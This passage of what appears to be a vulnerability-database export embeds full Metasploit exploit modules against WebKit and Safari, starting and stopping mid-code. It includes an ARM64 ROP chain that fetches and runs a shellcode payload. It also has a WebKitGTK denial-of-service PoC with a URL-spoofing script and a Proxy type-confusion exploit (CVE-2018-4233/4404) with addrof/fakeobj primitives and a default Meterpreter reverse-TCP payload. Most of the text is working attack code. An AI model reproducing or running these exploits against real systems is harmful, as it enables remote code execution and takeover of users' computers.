memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\r\n }\r\n\r\n var shsz = new Int64(\"0x100000\");\r\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\r\n var codeAddr = Sub(memPoolEnd, shsz);\r\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\r\n\r\n memory.writeInt64(Add(vtab, 0x18), longjmp);\r\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\r\n\r\n var arrsz = 0x100000,\r\n off = 0x1000;\r\n var arr = new Uint32Array(arrsz);\r\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\r\n\r\n var pos = arrsz - off;\r\n\r\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n x4 = x4 || Int64.Zero\r\n\r\n // in stackloader:\r\n arr[pos++] = 0xdead0010; // unused\r\n arr[pos++] = 0xdead0011; // unused\r\n arr[pos++] = 0xdead0012; // unused\r\n arr[pos++] = 0xdead0013; // unused\r\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\r\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\r\n arr[pos++] = 0xdead0014; // x27 (unused)\r\n arr[pos++] = 0xdead0015; // x27 (unused)\r\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\r\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\r\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\r\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\r\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\r\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\r\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\r\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\r\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\r\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\r\n arr[pos++] = func.lo(); // x21 (func)\r\n arr[pos++] = func.hi(); // x21 (func)\r\n arr[pos++] = 0xdbad0018; // x20 (unused)\r\n arr[pos++] = 0xdbad0019; // x20 (unused)\r\n arr[pos++] = 0xdead001a; // x19 (unused)\r\n arr[pos++] = 0xdead001b; // x19 (unused)\r\n var tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\r\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\r\n arr[pos++] = regloader.lo(); // x30 (first gadget)\r\n arr[pos++] = regloader.hi(); // x30 (first gadget)\r\n\r\n // after dispatch:\r\n arr[pos++] = 0xdead0020; // unused\r\n arr[pos++] = 0xdead0021; // unused\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n arr[pos++] = 0xdead0024; // x22 (unused)\r\n arr[pos++] = 0xdead0025; // x22 (unused)\r\n arr[pos++] = 0xdead0026; // x21 (unused)\r\n arr[pos++] = 0xdead0027; // x21 (unused)\r\n arr[pos++] = 0xdead0028; // x20 (unused)\r\n arr[pos++] = 0xdead0029; // x20 (unused)\r\n arr[pos++] = 0xdead002a; // x19 (unused)\r\n arr[pos++] = 0xdead002b; // x19 (unused)\r\n tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\r\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\r\n arr[pos++] = jump_to.lo(); // x30 (gadget)\r\n arr[pos++] = jump_to.hi(); // x30 (gadget)\r\n }\r\n\r\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\r\n //x4 = x4 || Int64.One\r\n // in stackloader:\r\n arr[pos++] = 0xdead0010; // unused\r\n arr[pos++] = 0xdead0011; // unused\r\n arr[pos++] = 0xdead0012; // unused\r\n arr[pos++] = 0xdead0013; // unused\r\n arr[pos++] = 0xdead1101; // x28 (unused)\r\n arr[pos++] = 0xdead1102; // x28 (unused)\r\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\r\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\r\n arr[pos++] = 0xdead0016; // x26 (unused)\r\n arr[pos++] = 0xdead0017; // x26 (unused)\r\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\r\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\r\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\r\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\r\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\r\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\r\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\r\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\r\n arr[pos++] = func.lo(); // x21 (target for dispatch)\r\n arr[pos++] = func.hi(); // x21 (target for dispatch)\r\n arr[pos++] = 0xdead0018; // x20 (unused)\r\n arr[pos++] = 0xdead0019; // x20 (unused)\r\n var tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = 0xdead001c; // x29 (unused)\r\n arr[pos++] = 0xdead001d; // x29 (unused)\r\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\r\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\r\n\r\n // in ldrx8\r\n if (x4) {\r\n arr[pos++] = stackloader.lo();\r\n arr[pos++] = stackloader.hi();\r\n } else {\r\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\r\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\r\n }\r\n arr[pos++] = 0xdead1401; // (unused)\r\n arr[pos++] = 0xdead1402; // (unused)\r\n arr[pos++] = 0xdead1301; // x20 (unused)\r\n arr[pos++] = 0xdead1302; // x20 (unused)\r\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\r\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\r\n arr[pos++] = 0xdead1201; // x29 (unused)\r\n arr[pos++] = 0xdead1202; // x29 (unused)\r\n arr[pos++] = regloader.lo(); // x30 (next gadget)\r\n arr[pos++] = regloader.hi(); // x30 (next gadget)\r\n\r\n // in regloader\r\n // NOTE: REGLOADER DOES NOT ADJUST SP!\r\n // sometimes i didn't get expected value in x4\r\n // and i have no fucking idea why\r\n // usleep likely did the trick, but I would still keep the code\r\n // with movx4\r\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\r\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\r\n\r\n if (x4) {\r\n // in stackloader:\r\n arr[pos++] = 0xdaad0010; // unused\r\n arr[pos++] = 0xdaad0011; // unused\r\n arr[pos++] = 0xdaad0012; // unused\r\n arr[pos++] = 0xdaad0013; // unused\r\n arr[pos++] = 0xdaad1101; // x28 (unused)\r\n arr[pos++] = 0xdaad1102; // x28 (unused)\r\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\r\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\r\n arr[pos++] = 0xdaad0016; // x26 (unused)\r\n arr[pos++] = 0xdaad0017; // x26 (unused)\r\n arr[pos++] = 0xdaad0018; // x25 (unused)\r\n arr[pos++] = 0xdaad0019; // x25 (unused)\r\n arr[pos++] = 0xdaad00f0; // x24 (unused)\r\n arr[pos++] = 0xdaad00f1; // x24 (unused)\r\n arr[pos++] = 0xdaad00f2; // x23 (unused)\r\n arr[pos++] = 0xdaad00f3; // x23 (unused)\r\n arr[pos++] = 0xdaad00f4; // x22 (unused)\r\n arr[pos++] = 0xdaad00f5; // x22 (unused)\r\n arr[pos++] = func.lo(); // x21 (target for dispatch)\r\n arr[pos++] = func.hi(); // x21 (target for dispatch)\r\n arr[pos++] = 0xdaad0018; // x20 (unused)\r\n arr[pos++] = 0xdaad0019; // x20 (unused)\r\n tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = 0xdaad001c; // x29 (unused)\r\n arr[pos++] = 0xdaad001d; // x29 (unused)\r\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\r\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\r\n\r\n // in ldrx8\r\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\r\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\r\n arr[pos++] = 0xdaad1401; // (unused)\r\n arr[pos++] = 0xdaad1402; // (unused)\r\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\r\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\r\n arr[pos++] = 0xdaad1301; // x19 (unused)\r\n arr[pos++] = 0xdaad1302; // x19 (unused)\r\n arr[pos++] = 0xdaad1201; // x29 (unused)\r\n arr[pos++] = 0xdaad1202; // x29 (unused)\r\n arr[pos++] = movx4.lo(); // x30 (next gadget)\r\n arr[pos++] = movx4.hi(); // x30 (next gadget)\r\n }\r\n\r\n // after dispatch:\r\n\r\n // keep only one: these or 0xdeaded01\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n arr[pos++] = 0xdead0024; // x22 (unused)\r\n arr[pos++] = 0xdead0025; // x22 (unused)\r\n arr[pos++] = 0xdead0026; // x21 (unused)\r\n arr[pos++] = 0xdead0027; // x21 (unused)\r\n arr[pos++] = 0xdead0028; // x20 (unused)\r\n arr[pos++] = 0xdead0029; // x20 (unused)\r\n arr[pos++] = 0xdead002a; // x19 (unused)\r\n arr[pos++] = 0xdead002b; // x19 (unused)\r\n arr[pos++] = 0xdead002c; // x29 (unused)\r\n arr[pos++] = 0xdead002d; // x29 (unused)\r\n arr[pos++] = jump_to.lo(); // x30 (gadget)\r\n arr[pos++] = jump_to.hi(); // x30 (gadget)\r\n }\r\n\r\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n x0 = x0 || Int64.Zero\r\n x1 = x1 || Int64.Zero\r\n x2 = x2 || Int64.Zero\r\n x3 = x3 || Int64.Zero\r\n jump_to = jump_to || stackloader\r\n\r\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\r\n func, x0, x1, x2, x3, x4, jump_to\r\n )\r\n }\r\n\r\n #{ios_11 ? '\r\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\r\n add_call(jitWriteSeparateHeaps\r\n , Sub(codeAddr, memPoolStart) // off\r\n , paddr // src\r\n , shsz // size\r\n );\r\n } else {\r\n fail(\"jitWrite\");\r\n }\r\n ' : '\r\n add_call(mach_vm_protect,\r\n mach_task_self_, // task\r\n codeAddr, // addr\r\n shsz, // size\r\n new Int64(0), // set maximum\r\n new Int64(7) // prot (RWX)\r\n );\r\n\r\n add_call(memmove,\r\n codeAddr, // dst\r\n paddr, // src\r\n shsz // size\r\n );\r\n '}\r\n\r\n add_call(codeAddr,\r\n dlopen,\r\n dlsym,\r\n jitWriteSeparateHeaps,\r\n memPoolStart,\r\n memPoolEnd,\r\n );\r\n\r\n for(var i = 0; i < 0x20; ++i)\r\n {\r\n arr[pos++] = 0xde00c0de + (i<<16);\r\n }\r\n\r\n var sp = Add(stack, (arrsz - off) * 4);\r\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\r\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\r\n\r\n // trigger\r\n //print(\"u rdy?\")\r\n wrapper.addEventListener(\"click\", function(){});\r\n\r\n}\r\n\r\n#{get_mem_rw}\r\n\r\nfunction go() {\r\n try {\r\n var req = new XMLHttpRequest;\r\n req.open(\"GET\", \"exploit\");\r\n req.responseType = \"arraybuffer\";\r\n req.addEventListener(\"load\", function() {\r\n try {\r\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\r\n payload.set(new Uint8Array(req.response), 0x0);\r\n pwn();\r\n } catch (e) {\r\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\r\n }\r\n });\r\n req.addEventListener(\"error\", function(ev) {\r\n fail(ev)\r\n });\r\n req.send()\r\n } catch (e) {\r\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\r\n }\r\n};\r\n\r\ngo();\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/\\/\\/.*$/, '') # strip comments\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend\n\n# 0day.today [2019-06-03] #", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/32828"}], "packetstorm": [{"lastseen": "2018-06-13T06:21:03", "description": "", "published": "2018-06-11T00:00:00", "type": "packetstorm", "title": "WebKitGTK+ WebKitFaviconDatabase Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "PACKETSTORM:148135", "href": "https://packetstormsecurity.com/files/148135/WebKitGTK-WebKitFaviconDatabase-Denial-Of-Service.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\", \n'Description' => %q( \nThis module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. \nIf successful, it could lead to application crash, resulting in denial of service. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Dhiraj Mishra', # Original discovery, disclosure \n'Hardik Mehta', # Original discovery, disclosure \n'Zubin Devnani', # Original discovery, disclosure \n'Manuel Caballero' #JS Code \n], \n'References' => [ \n['EDB', '44842'], \n['CVE', '2018-11646'], \n['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'], \n['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html'] \n], \n'DisclosureDate' => 'Jun 03 2018', \n'Actions' => [[ 'WebServer' ]], \n'PassiveActions' => [ 'WebServer' ], \n'DefaultAction' => 'WebServer' \n) \n) \nend \n \ndef run \nexploit # start http server \nend \n \ndef setup \n@html = <<-JS \n<script type=\"text/javascript\"> \nwin = window.open(\"WIN\", \"WIN\"); \nwindow.open(\"http://example.com/\", \"WIN\"); \nwin.document.execCommand('stop'); \nwin.document.write(\"HelloWorld\"); \nwin.document.close(); \n</script> \nJS \nend \n \ndef on_request_uri(cli, _request) \nprint_status('Sending response') \nsend_response(cli, @html) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148135/webkitplus.rb.txt"}, {"lastseen": "2018-06-06T09:30:47", "description": "", "published": "2018-06-05T00:00:00", "type": "packetstorm", "title": "WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "PACKETSTORM:148053", "href": "https://packetstormsecurity.com/files/148053/WebKitGTK-2.21.3-pageURL-Mishandling-Denial-Of-Service.html", "sourceData": "`Summary: \n \nwebkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue. \n \nPoC Author: @magicmac2000 \nFound Issue in Webkit: Dhiraj Mishra (Team w00t) \n \nPoC: \n \n<script> \nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \nwindow.open(\"https://www.paypal.com\", \"WIN\"); \nwin.document.execCommand('Stop'); \nwin.document.write(\"Spoofed URL\"); \nwin.document.close(); \n</script> \n \n \nBacktrace using fedora 27: \n \n#0 WTF::StringImpl::rawHash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508 \n#1 WTF::StringImpl::hasHash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514 \n#2 WTF::StringImpl::hash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525 \n#3 WTF::StringHash::hash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73 \n#9 WTF::HashMap, WTF::HashTraits >::get \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406 \n#10 webkitFaviconDatabaseSetIconURLForPageURL \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193 \n#11 webkitFaviconDatabaseSetIconForPageURL \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318 \n#12 webkitWebViewSetIcon \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964 \n#13 WTF::Function::performCallbackWithReturnValue \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108 \n#15 WebKit::WebPageProxy::dataCallback \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083 \n#16 WebKit::WebPageProxy::finishedLoadingIcon \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848 \n#17 IPC::callMemberFunctionImpl::operator() \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68 \n#29 WTF::RunLoop::::_FUN(gpointer) \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70 \n#30 g_main_dispatch \nat gmain.c line 3148 \n#31 g_main_context_dispatch \nat gmain.c line 3813 \n#32 g_main_context_iterate \nat gmain.c line 3886 \n#33 g_main_context_iteration \nat gmain.c line 3947 \n#34 g_application_run \nat gapplication.c line 2401 \n#35 main \nat ../src/ephy-main.c line 432 \n \n \nReference's: \n \nhttps://bugs.webkit.org/show_bug.cgi?id=186164 \nhttps://bugzilla.gnome.org/show_bug.cgi?id=795740 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148053/CVE-2018-11646.txt"}, {"lastseen": "2018-12-25T18:50:54", "description": "", "published": "2018-12-13T00:00:00", "type": "packetstorm", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-13T00:00:00", "id": "PACKETSTORM:150779", "href": "https://packetstormsecurity.com/files/150779/Safari-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe JIT region is then replaced with shellcode which loads the second stage. \nThe second stage exploits a logic error in libxpc, which uses command execution \nvia the launchd's \"spawn_via_launchd\" API (CVE-2018-4404). \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'saelo' ], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2018-4404'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/saelo/pwn2own2018'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n], \n'Arch' => [ ARCH_PYTHON, ARCH_CMD ], \n'Platform' => 'osx', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, \n'Targets' => [ \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \n]) \nend \n \ndef offset_table \n{ \n'10.12.6' => { \n:jsc_vtab => '0x0000d8d8', \n:dyld_stub_loader => '0x00001168', \n:dlopen => '0x000027f7', \n:confstr => '0x00002c84', \n:strlen => '0x00001b40', \n:strlen_got => '0xdc0', \n}, \n'10.13' => { \n:jsc_vtab => '0x0000e5f8', \n:dyld_stub_loader => '0x000012a8', \n:dlopen => '0x00002e60', \n:confstr => '0x000024fc', \n:strlen => '0x00001440', \n:strlen_got => '0xee8', \n}, \n'10.13.3' => { \n:jsc_vtab => '0xe5e8', \n:dyld_stub_loader => '0x1278', \n:dlopen => '0x2e30', \n:confstr => '0x24dc', \n:strlen => '0x1420', \n:strlen_got => '0xee0', \n}, \n} \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef stage1_js \nstage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\" \n\"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\" \nend \n \ndef stage2_js \nstage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\" \npayload_cmd = payload.raw \nif target['Arch'] == ARCH_PYTHON \npayload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\" \nend \nplaceholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER') \nstage2[placeholder_index, payload_cmd.length] = payload_cmd \n\"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\" \nend \n \ndef get_offsets(user_agent) \nif user_agent =~ /Intel Mac OS X (.*?)\\)/ \nversion = $1.gsub(\"_\", \".\") \nmac_osx_version = Gem::Version.new(version) \nif mac_osx_version >= Gem::Version.new('10.13.4') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Gem::Version.new('10.12') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif offset_table.key?(version) \noffset = offset_table[version] \nreturn <<-EOF \nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]}; \nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]}; \nconst DLOPEN_OFFSET = #{offset[:dlopen]}; \nconst CONFSTR_OFFSET = #{offset[:confstr]}; \nconst STRLEN_OFFSET = #{offset[:strlen]}; \nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]}; \nEOF \nelse \nprint_warning \"No offsets for version #{mac_osx_version}\" \nend \nelse \nprint_warning \"Unexpected User-Agent\" \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nuser_agent = request['User-Agent'] \nprint_status(\"Request from #{user_agent}\") \noffsets = get_offsets(user_agent) \nunless offsets \nsend_not_found(cli) \nreturn \nend \n \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \nhtml = %Q^ \n<html> \n<body> \n<script> \n#{stage1_js} \nstage1.replace = function(oldVal, newVal) { \nfor (var idx = 0; idx < this.length; idx++) { \nvar found = true; \nfor (var j = idx; j < idx + 8; j++) { \nif (this[j] != oldVal.byteAt(j - idx)) { \nfound = false; \nbreak; \n} \n} \nif (found) \nbreak; \n} \nthis.set(newVal.bytes(), idx); \n}; \n#{stage2_js} \n#{utils} \n#{int64} \n#{offsets} \n \nvar ready = new Promise(function(resolve) { \nif (typeof(window) === 'undefined') \nresolve(); \nelse \nwindow.onload = function() { \nresolve(); \n} \n}); \n \nready = Promise.all([ready]); \n \nprint = function(msg) { \n//console.log(msg); \n//document.body.innerText += msg + '\\\\n'; \n} \n \n// Must create this indexing type transition first, \n// otherwise the JIT will deoptimize later. \nvar a = [13.37, 13.37]; \na[0] = {}; \n \nvar referenceFloat64Array = new Float64Array(0x1000); \n \n// \n// Bug: the DFG JIT does not take into account that, through the use of a \n// Proxy, it is possible to run arbitrary JS code during the execution of a \n// CreateThis operation. This makes it possible to change the structure of e.g. \n// an argument without causing a bailout, leading to a type confusion. \n// \n \n// \n// addrof primitive \n// \nfunction setupAddrof() { \nfunction InfoLeaker(a) { \nthis.address = a[0]; \n} \n \nvar trigger = false; \nvar leakme = null; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = leakme; \nreturn target[propname]; \n}, \n}; \nvar InfoLeakerProxy = new Proxy(InfoLeaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew InfoLeakerProxy([1.1, 2.2, 3.3]); \n} \n \ntrigger = true; \n \nreturn function(obj) { \nleakme = obj; \narg = [1.1, 1.1]; \nvar o = new InfoLeakerProxy(arg); \nreturn o.address; \n}; \n} \n \n// \n// fakeobj primitive \n// \nfunction setupFakeobj() { \nfunction ObjFaker(a, address) { \na[0] = address; \n} \n \nvar trigger = false; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = {}; \nreturn target[propname]; \n}, \n}; \nvar ObjFakerProxy = new Proxy(ObjFaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew ObjFakerProxy([1.1, 2.2, 3.3], 13.37); \n} \n \ntrigger = true; \n \nreturn function(address) { \narg = [1.1, 1.1]; \nvar o = new ObjFakerProxy(arg, address); \nreturn arg[0]; \n}; \n} \n \nfunction makeJITCompiledFunction() { \n// Some code to avoid inlining... \nfunction target(num) { \nfor (var i = 2; i < num; i++) { \nif (num % i === 0) { \nreturn false; \n} \n} \nreturn true; \n} \n \n// Force JIT compilation. \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nreturn target; \n} \n \nfunction pwn() { \n// Spray Float64Array structures so that structure ID 0x1000 will \n// be a Float64Array with very high probability \nvar structs = []; \nfor (var i = 0; i < 0x1000; i++) { \nvar a = new Float64Array(1); \na['prop' + i] = 1337; \nstructs.push(a); \n} \n \n// Setup exploit primitives \nvar addrofOnce = setupAddrof(); \nvar fakeobjOnce = setupFakeobj(); \n \n// (Optional) Spray stuff to keep the background GC busy and increase reliability even further \n/* \nvar stuff = []; \nfor (var i = 0; i < 0x100000; i++) { \nstuff.push({foo: i}); \n} \n*/ \n \nvar float64MemView = new Float64Array(0x200); \nvar uint8MemView = new Uint8Array(0x1000); \n \n// Setup container to host the fake Float64Array \nvar jsCellHeader = new Int64([ \n00, 0x10, 00, 00, // m_structureID \n0x0, // m_indexingType \n0x2b, // m_type \n0x08, // m_flags \n0x1 // m_cellState \n]); \n \nvar container = { \njsCellHeader: jsCellHeader.asJSValue(), \nbutterfly: null, \nvector: float64MemView, \nlength: (new Int64('0x0001000000001337')).asJSValue(), \nmode: {}, // an empty object, we'll need that later \n}; \n \n// Leak address and inject fake object \n// RawAddr == address in float64 form \nvar containerRawAddr = addrofOnce(container); \nvar fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16); \nprint(\"[+] Fake Float64Array @ \" + fakeArrayAddr); \n \n/// \n/// BEGIN CRITICAL SECTION \n/// \n/// Objects are corrupted, a GC would now crash the process. \n/// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations. \n/// \nvar driver = fakeobjOnce(fakeArrayAddr.asDouble()); \nwhile (!(driver instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue(); \n} \n \n// Get some addresses that we'll need to repair our objects. We'll abuse the .mode \n// property of the container to leak addresses. \ndriver[2] = containerRawAddr; \nvar emptyObjectRawAddr = float64MemView[6]; \ncontainer.mode = referenceFloat64Array; \nvar referenceFloat64ArrayRawAddr = float64MemView[6]; \n \n// Fixup the JSCell header of the container to make it look like an empty object. \n// By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array. \ndriver[2] = emptyObjectRawAddr; \nvar header = float64MemView[0]; \ndriver[2] = containerRawAddr; \nfloat64MemView[0] = header; \n \n// Copy the JSCell header from an existing Float64Array and set the butterfly to zero. \n// Also set the mode: make it look like an OversizeTypedArray for easy GC survival \n// (see JSGenericTypedArrayView<Adaptor>::visitChildren). \ndriver[2] = referenceFloat64ArrayRawAddr; \nvar header = float64MemView[0]; \nvar length = float64MemView[3]; \nvar mode = float64MemView[4]; 